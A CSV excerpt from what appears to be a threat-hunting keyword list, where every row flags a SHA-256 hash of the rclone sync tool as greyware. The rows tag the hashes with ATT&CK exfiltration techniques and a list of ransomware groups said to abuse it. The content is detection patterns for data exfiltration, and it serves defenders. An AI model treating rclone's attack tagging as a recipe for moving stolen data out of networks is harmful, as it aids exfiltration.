"*70feebe9f930310824eda3d246b5b85b0106cb5aa876390827d4743661362026*",".{0,1000}70feebe9f930310824eda3d246b5b85b0106cb5aa876390827d4743661362026.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7110096e52faff29a4d6c683d1223876280852679963a1d7dac8d79994369a65*",".{0,1000}7110096e52faff29a4d6c683d1223876280852679963a1d7dac8d79994369a65.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71737381ff602f28a74621db960d7fc62a2926b83f61ef9024024eae09237271*",".{0,1000}71737381ff602f28a74621db960d7fc62a2926b83f61ef9024024eae09237271.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71938906831a2fbab00a0519cb8a1f6aaa31425d528df130e60ca371f0dd45ab*",".{0,1000}71938906831a2fbab00a0519cb8a1f6aaa31425d528df130e60ca371f0dd45ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71a74ecc3adea709976ea8995e4e692982dfb9bdacd839f9e66df426f91537c0*",".{0,1000}71a74ecc3adea709976ea8995e4e692982dfb9bdacd839f9e66df426f91537c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71b3685e138ff787324a21d5192d9e90b0c6c2d752b99837db80c7486d1a6cf7*",".{0,1000}71b3685e138ff787324a21d5192d9e90b0c6c2d752b99837db80c7486d1a6cf7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71be22b601b991d36eede50c35c3dbd9e5854e8555860f974e4a13cfe721e32f*",".{0,1000}71be22b601b991d36eede50c35c3dbd9e5854e8555860f974e4a13cfe721e32f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71d606337dad38eabe7321a8f82672b1c214c5334b340f2cc4a5b296efe157f5*",".{0,1000}71d606337dad38eabe7321a8f82672b1c214c5334b340f2cc4a5b296efe157f5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*71d9d8c3e4260db98cae345523171ba30c983d38d7b94724448a791527e206a3*",".{0,1000}71d9d8c3e4260db98cae345523171ba30c983d38d7b94724448a791527e206a3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7207b7631683005ed4b09b1a1f07a781284761fc143a8cce873e9cc500530f06*",".{0,1000}7207b7631683005ed4b09b1a1f07a781284761fc143a8cce873e9cc500530f06.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7266febec1f01a25d6575de51c44ddf749071a4950a6384e4164954dff7ac37e*",".{0,1000}7266febec1f01a25d6575de51c44ddf749071a4950a6384e4164954dff7ac37e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*727adce0f900a6991f36b3efdde89d49e1435ff9c2a9bd5623bdc929c65b623b*",".{0,1000}727adce0f900a6991f36b3efdde89d49e1435ff9c2a9bd5623bdc929c65b623b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*72807b455e5a1fa442bb1d06bab1efac76e5b7e23256d0c1ab869a02cef890d2*",".{0,1000}72807b455e5a1fa442bb1d06bab1efac76e5b7e23256d0c1ab869a02cef890d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*72cae1ce4bdd18227d0917fb2002615d0c78a6485a2daf850e2494ccab6aa4df*",".{0,1000}72cae1ce4bdd18227d0917fb2002615d0c78a6485a2daf850e2494ccab6aa4df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*72dd6e4cdd75c245adf8c59c9dc4eeae3cd474ec459b238c714282e66a04ae70*",".{0,1000}72dd6e4cdd75c245adf8c59c9dc4eeae3cd474ec459b238c714282e66a04ae70.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7395137f9c26a99367fec72c608e85b7fcc078aad85fa19f48a9debe6a2ffae9*",".{0,1000}7395137f9c26a99367fec72c608e85b7fcc078aad85fa19f48a9debe6a2ffae9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*73af3c4a756699cf07ae67395f549b754ef562cfc02b764a0455cd211ec42142*",".{0,1000}73af3c4a756699cf07ae67395f549b754ef562cfc02b764a0455cd211ec42142.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*73f20bfc29a0308600ab347f8a9b6ad0c72ea18173d44e763514bedc1f6e3023*",".{0,1000}73f20bfc29a0308600ab347f8a9b6ad0c72ea18173d44e763514bedc1f6e3023.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*740bd508d67ae19842b9f48b4433cf6f41f3e42f8f12f177ca0767f7985dfa1d*",".{0,1000}740bd508d67ae19842b9f48b4433cf6f41f3e42f8f12f177ca0767f7985dfa1d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*743592ce1fa6a16f1abf80c3226237e59e4661491124a5f97824a0dfc5ae0ba2*",".{0,1000}743592ce1fa6a16f1abf80c3226237e59e4661491124a5f97824a0dfc5ae0ba2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*74395de1ba089f44dd7379d38254e3c4aa022341143482f0ddaf19011de25d10*",".{0,1000}74395de1ba089f44dd7379d38254e3c4aa022341143482f0ddaf19011de25d10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7445aec09c2d4cd750b8ae74e8fdabbb43a93005570682be5ab889aa0937771d*",".{0,1000}7445aec09c2d4cd750b8ae74e8fdabbb43a93005570682be5ab889aa0937771d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*748696842cc0d2277c0ffed2dec5a42aa3822558465770a638e730e9a1956c7e*",".{0,1000}748696842cc0d2277c0ffed2dec5a42aa3822558465770a638e730e9a1956c7e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*74a47f3037ee817f08ebec905b4dfe43c9fb88c15f82535296e00252d52e8103*",".{0,1000}74a47f3037ee817f08ebec905b4dfe43c9fb88c15f82535296e00252d52e8103.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*74cefaab7643651255c870159cec7f7231f66cfe509e9598fb3f1078549d6c49*",".{0,1000}74cefaab7643651255c870159cec7f7231f66cfe509e9598fb3f1078549d6c49.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*74e054fd266e44bb50951cfc626f3bc0ad9f820ab8bd444bcd81308aed7c1521*",".{0,1000}74e054fd266e44bb50951cfc626f3bc0ad9f820ab8bd444bcd81308aed7c1521.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*751670c4b55addd996a3e58b5be6203aa481b4f090514f32d4eb11906830f098*",".{0,1000}751670c4b55addd996a3e58b5be6203aa481b4f090514f32d4eb11906830f098.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7537476764f218919dd4eef5affee61286e88eaab8b0c3fd5a95b3285e9e90c0*",".{0,1000}7537476764f218919dd4eef5affee61286e88eaab8b0c3fd5a95b3285e9e90c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75a0df17aa8f770e15a71aae53fa30d3b2d822756c915228c499e33c8006a960*",".{0,1000}75a0df17aa8f770e15a71aae53fa30d3b2d822756c915228c499e33c8006a960.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75a4733b689d72c6fe7133c5547952f2264ff63af1fdf8794c8a63fb98d9eed1*",".{0,1000}75a4733b689d72c6fe7133c5547952f2264ff63af1fdf8794c8a63fb98d9eed1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75aa0f10da5eebe668564c35d467330b2432bceadfc74a7177def720b66fce6e*",".{0,1000}75aa0f10da5eebe668564c35d467330b2432bceadfc74a7177def720b66fce6e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75accdaedad3b82edc185dc8824a19a59c30dc6392de7074b6cd98d1dc2c9040*",".{0,1000}75accdaedad3b82edc185dc8824a19a59c30dc6392de7074b6cd98d1dc2c9040.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75d3a8726d4989bd93120a0d2072ad533bfa44bd57aa156d524844cb04d6408e*",".{0,1000}75d3a8726d4989bd93120a0d2072ad533bfa44bd57aa156d524844cb04d6408e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*75ea00374c071424bf1fda860ad857049f82c82298e5a10d8a79412d4124a87c*",".{0,1000}75ea00374c071424bf1fda860ad857049f82c82298e5a10d8a79412d4124a87c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*7615aa42e43a01180dc29308b8ab3ba64d36c91e4d7fa661e3621e374de38e6a*",".{0,1000}7615aa42e43a01180dc29308b8ab3ba64d36c91e4d7fa661e3621e374de38e6a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*766aefca85a31be65bb759d69203c9ade3288316fba346a11119e80763edf705*",".{0,1000}766aefca85a31be65bb759d69203c9ade3288316fba346a11119e80763edf705.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
